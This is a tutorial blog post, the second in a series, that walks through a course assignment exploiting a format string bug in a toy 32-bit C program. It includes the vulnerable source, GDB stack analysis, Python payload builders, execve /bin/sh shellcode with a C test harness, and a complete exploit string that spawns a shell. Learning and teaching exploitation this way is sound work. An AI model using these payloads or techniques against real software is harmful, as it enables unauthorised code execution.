DEV Community

Alexander Lee

Journey to understand format string attack (Part 2)

Part 1:
https://dev.to/duracellrabbid/journey-to-understand-format-string-attack-part-1-5dda

In Part 1, I mentioned that one of my motivations for writing these posts was that it took me a freaking long time to understand how a format string attack works. To give you some context, I first learned about it in late 2021/early 2022, and it took me a good 2.5 years to fully understand it. Still, I wanted to share my learning journey and where I eventually ended up.

The Task

Here, I will talk about the assignment that helped propel me into this journey. In the assignment, I was asked to run shellcode using a "memory exploit" in the program. The source code was provided and looked something like this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vul1(char *arg)
{
  char buffer[400];
  snprintf(buffer, sizeof buffer, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "cstarget: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  vul1(argv[1]);

  return 0;
}

The code can be compiled in gcc using the following flags:

-mpreferred-stack-boundary=2 -ggdb -m32 -L/usr/lib32 -fno-stack-protector

Unfortunately, the source code and compilation flags were only for reference. I had to perform the attack on the given binary, with ASLR turned off.

Analysis

First of all, we can see that the binary needs to run with one, and only one argument.

It then uses snprintf to print this argument into a buffer of 400 chars. Initially, I thought this could be exploited with a buffer overflow, but snprintf never writes more than the size of buffer it is given. That makes a BoF attack unviable.

We are talking about format string vulnerabilities, right? Guess what? We have snprintf, and arg is passed to it directly as the format string!

snprintf does not print anything to the screen. It formats the given string according to the format specifiers and writes the result, up to the specified length, into a buffer. A quick run of the binary with an argument confirms that nothing is printed.

No fear though! We have GDB. GDB is our friend. Let's bring along GEF for the ride as well.

Image description

Image description

From the screenshots, I noticed that buffer is at $esp. The return address is stored at +0x198 from buffer. In any case, I knew that the saved instruction address is 0x56556236.

The simplest approach is to overwrite this saved return address so that execution jumps to my shellcode. Since the stack is executable, there are 3 potential places to put the shellcode: buffer, arg and the environment variables. I chose buffer as it is the easiest.

In addition, I observed one issue. Look at the screenshot where I planted 64 NOPs into the stack.

Image description

Note that the start of buffer changes as the size of the argument for vul1 increases. This is kind of expected. Remember my ugly stack drawing in Part 1:

Image description

The argument string itself sits higher up on the stack than vul1's frame, so a longer argument pushes everything below it, buffer included, to a lower address.

Is that a concern for us? Yes and no. If we are not careful, the addresses that we need to write to will be wrong. However, if we construct the format string correctly and keep its length fixed, the addresses will land right where we want them.

The format string

In this round, my approach will be:

<shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n

Shellcode + NOPs = 64 bytes (any multiple of 4 works)
address1 = the stack address that holds the saved return address
address2 = address1 + 0x2
A = lower 16 bits of the buffer's starting address - 64 - 8 (the 64 + 8 bytes are already counted before %Ax runs)
B = upper 16 bits of the buffer's starting address - lower 16 bits of the buffer's starting address
G = (64 / 4) + 1
H = G + 1
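
The definitions above can be turned into a small calculation. This is only a sketch: the function name is made up for illustration, the buffer address 0xffffcdb4 is the one found later in this post, and it assumes the upper 16 bits of the address are larger than the lower 16 bits (true here, but not in general).

```python
def format_string_params(buffer_addr: int, prefix_len: int = 64) -> dict:
    """Derive A, B, G and H for <prefix><address1><address2>%Ax%G$n%Bx%H$n.

    Hypothetical helper for illustration; prefix_len is shellcode + NOPs.
    """
    if prefix_len % 4 != 0:
        raise ValueError("prefix length must be a multiple of 4")
    low = buffer_addr & 0xFFFF            # lower 16 bits of the target address
    high = (buffer_addr >> 16) & 0xFFFF   # upper 16 bits of the target address
    already_counted = prefix_len + 8      # prefix plus the two 4-byte addresses
    a = low - already_counted             # padding needed to reach `low`
    b = high - low                        # extra padding needed to reach `high`
    if a <= 0 or b <= 0:
        raise ValueError("this simple scheme assumes high > low > prefix_len + 8")
    g = prefix_len // 4 + 1               # stack position of address1
    return {"A": a, "B": b, "G": g, "H": g + 1}


params = format_string_params(0xFFFFCDB4)
print(params)  # {'A': 52588, 'B': 12875, 'G': 17, 'H': 18}
```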

Sounds abstract? I figured. Let's use Excel to visualize the stack.

Image description

A few observations here:

  1. The shellcode is at the start of the buffer. This is because the starting address of the buffer is relatively easy to obtain. Not every day is a Saturday, so when you get the chance to be lazy, you take it.
  2. The NOPs are there to align the stack. Imagine if we did not have the NOPs. This would happen:

Image description

The addresses would straddle two stack positions, so no single positional argument would hold a full address. Adding the NOP padding ensures that our addresses always sit at the 17th and 18th positions of the stack. (Take 1 position on the stack as 4 bytes, since we are working with 32 bits.)
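
To make the alignment point concrete, here is a minimal sketch that reports which 4-byte stack positions an address occupies when it is placed after a prefix of a given length. The helper name is invented for this example, and it assumes position 1 is the first 4 bytes of buffer, as in the layout above.

```python
def stack_positions(prefix_len: int) -> list:
    """Return the 1-based 4-byte positions covered by a 4-byte address
    that starts prefix_len bytes into the buffer (hypothetical helper)."""
    first_byte = prefix_len
    last_byte = prefix_len + 3
    # A set removes the duplicate when both ends fall in the same position.
    return sorted({first_byte // 4 + 1, last_byte // 4 + 1})


print(stack_positions(64))  # [17]      address1 fits exactly in position 17
print(stack_positions(68))  # [18]      address2 fits exactly in position 18
print(stack_positions(45))  # [12, 13]  unpadded 45-byte shellcode: address is split
```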

Finding the addresses

I like to break my tasks down into smaller pieces. Let's break the format string into steps.

  1. 64 NOPs - They are placeholders for the shellcode
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64)") 


Image description

  2. 64 NOPs + the 2 placeholder addresses
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4)")

Image description

  3. The entire format string in placeholder values
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4 + b'%12356x%17\$x%12345x%18\$x')")

Image description

Image description

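From here, we know that our shellcode will start at 0xffffcdb4. We also know that the saved eip is stored at 0xffffcf4c. Because the placeholder string has the same length as the final one, these addresses will not move. With this information: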
address1 = \x4c\xcf\xff\xff
address2 = \x4e\xcf\xff\xff
A = 0xcdb4 - 72 = 52588
B = 0xffff - 0xcdb4 = 12875
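
As a sanity check on these numbers, the two %n writes can be modelled in a few lines. This is a toy model rather than how snprintf is implemented: it only tracks the running character count and treats each %n as a 4-byte little-endian store, and the variable and function names are made up for the example.

```python
import struct

RET_SLOT = 0xFFFFCF4C   # where the saved eip is stored (from the post)
A, B = 52588, 12875     # padding widths computed above

# Little-endian byte strings for address1 and address2.
address1 = struct.pack("<I", RET_SLOT)
address2 = struct.pack("<I", RET_SLOT + 2)

memory = bytearray(8)   # models the 8 bytes starting at RET_SLOT


def percent_n(addr: int, count: int) -> None:
    """Model %n: store the running count as a 4-byte little-endian int."""
    offset = addr - RET_SLOT
    memory[offset:offset + 4] = struct.pack("<I", count)


count = 64 + 8                  # shellcode/NOP block plus the two addresses
count += A                      # %Ax pads the output by A characters
percent_n(RET_SLOT, count)      # %17$n writes 0x0000cdb4 at address1
count += B                      # %Bx pads by a further B characters
percent_n(RET_SLOT + 2, count)  # %18$n writes 0x0000ffff at address2

new_return = struct.unpack("<I", memory[:4])[0]
print(address1.hex(), address2.hex(), hex(new_return))
# 4ccfffff 4ecfffff 0xffffcdb4
```

Note that the second write is also 4 bytes wide, so in this model the two bytes just past the return address slot end up zeroed.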

The shellcode

For the purpose of the exercise, we will use the following shellcode from this article:

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"

The next question is, how do we know if the shellcode works? We can test it with a simple C program.

// Filename: shellcode.c
// Compile:  gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode

#include <stdio.h>
#include <string.h>

void callShell(void) {
        // Local array, so the bytes live on the (executable) stack.
        const char code[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        // strlen returns size_t, so print it with %zu rather than %d.
        printf("Shellcode Length: %zu\n", strlen(code));

        // Cast the array to a function pointer and jump into it.
        ((void(*)(void))code)();
}

int main(void)
{
        callShell();
        return 0;
}

Image description

Nice, the length of the shellcode is 45, so we just need 19 more NOPs to pad it to 64. Some of you may have noticed that I could have padded with just 3 more NOPs to reach 48. But I like 64, so I go with 64.

shellcode + NOPs = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
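
The same padding can be produced and checked in Python instead of being counted by hand. A minimal sketch, where pad_with_nops is a name I made up for this example:

```python
SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)


def pad_with_nops(code: bytes, total: int = 64) -> bytes:
    """Append 0x90 (NOP) bytes after the code until it is `total` bytes long."""
    if len(code) > total:
        raise ValueError("code is longer than the requested block size")
    return code + b"\x90" * (total - len(code))


block = pad_with_nops(SHELLCODE)
print(len(SHELLCODE), len(block), len(block) - len(SHELLCODE))  # 45 64 19
```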

The full format string should be:

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4c\xcf\xff\xff\x4e\xcf\xff\xff%52588x%17$n%12875x%18$n
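
For anyone who prefers to assemble the argument in a script, here is a rough sketch that plugs in the values found above (address1 = 0xffffcf4c, A = 52588, B = 12875). The function name is hypothetical and the 64-byte block is a NOP stand-in for shellcode + NOPs. It also checks two things that are easy to get wrong: the argument must not contain NUL bytes, and it must be exactly as long as the placeholder version, otherwise the stack addresses shift.

```python
import struct


def build_argument(block: bytes, ret_slot: int, a: int, b: int) -> bytes:
    """Assemble <block><address1><address2>%Ax%G$n%Bx%H$n (illustrative helper)."""
    if len(block) % 4 != 0:
        raise ValueError("block length must be a multiple of 4")
    g = len(block) // 4 + 1                        # stack position of address1
    addresses = struct.pack("<II", ret_slot, ret_slot + 2)
    directives = f"%{a}x%{g}$n%{b}x%{g + 1}$n".encode("ascii")
    payload = block + addresses + directives
    if b"\x00" in payload:
        raise ValueError("a command-line argument cannot contain NUL bytes")
    return payload


block = b"\x90" * 64  # stand-in for the 64-byte shellcode + NOP block
probe = block + b"\xff" * 4 + b"\xee" * 4 + b"%12345x%17$x%12345x%18$x"
final = build_argument(block, 0xFFFFCF4C, 52588, 12875)

print(len(probe) == len(final))  # True
print(final[64:])
# b'L\xcf\xff\xffN\xcf\xff\xff%52588x%17$n%12875x%18$n'
```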

Now we will test it out:

Image description

Image description

YES! A shell is opened. Mission accomplished? Not quite. There is more to the assignment, but it is beyond the scope of this write-up.

...One more thing

In essence, this should not be a difficult exercise for most seasoned CTF players. However, it is easy to get segmentation faults when working with format string attacks, which can be frustrating for beginners like me. I found that the best thing to do is to break the task down into smaller pieces and figure out each piece individually.

To quote Dr Andrew Wiles: I think I'll stop here.
